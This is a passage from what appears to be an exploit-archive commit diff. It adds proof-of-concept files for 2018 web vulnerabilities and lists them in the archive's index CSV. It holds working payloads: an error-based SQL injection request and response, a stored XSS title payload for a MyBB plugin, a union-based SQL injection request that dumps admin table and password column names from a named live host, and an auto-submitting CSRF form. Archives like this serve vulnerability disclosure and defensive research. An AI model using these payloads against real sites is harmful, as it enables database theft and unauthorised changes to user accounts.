Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -&submit=Search
/////////RESPONSE//////////
<form method="post" action="/login-script-demo/users.php">
<select class="new-url2 form-control" name="my_item">
<br />
<b>Warning</b>: PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
<br />
<b>Warning</b>: main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
<option value="all">All</option>
################################################################################

25
exploits/php/webapps/44795.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting
# Date: 5/25/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1125
# Version: 1.0.2
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11532
1. Description:
This plugin displays advanced statistics on the index page such as latest posts with auto refresh using AJAX.
2. Proof of Concept:
Create a new thread with the following payload as the title <svg onload=alert('XSS')>
The alert will appear on the index page
3. Solution:
Update to the latest release

46
exploits/php/webapps/44799.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10
# POC : SQLi :
# Parameter : search
# Type : Union based
# Payload :
1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#
# Request
POST /demo/fbclone/top-search.php HTTP/1.1
Host: smsemailmarketing.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smsemailmarketing.in/demo/fbclone/setting.php
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 231
Connection: keep-alive
search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#
# Response
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 29 May 2018 17:12:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 5370
<a href='friend-profile.php?id='><img src="images/unknown.jpeg"
height="40px"
width="40px">About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description
</a></div>

28
exploits/php/webapps/44800.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10
# Description :
# Facebook Clone Script 1.0.5 has csrf vulnerability which attacker can
# easily change user information .
# POC :
<html>
<head>
<title>Change information</title>
</head>
<body>
<form action="http://smsemailmarketing.in/demo/fbclone/setting.php" method="POST">
<input type="hidden" name="fn" value="anything" />
<input type="hidden" name="ln" value="anything" />
<input type="hidden" name="chnname" value="anything" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

9
files_exploits.csv
View file

@ -9746,6 +9746,8 @@ id,file,description,date,author,type,platform,port
44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux, 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android, 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android,
44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86, 44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39461,3 +39463,10 @@ id,file,description,date,author,type,platform,port
44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, 44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, 44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php, 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,
44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp,
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php,
44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,

Can't render this file because it is too large.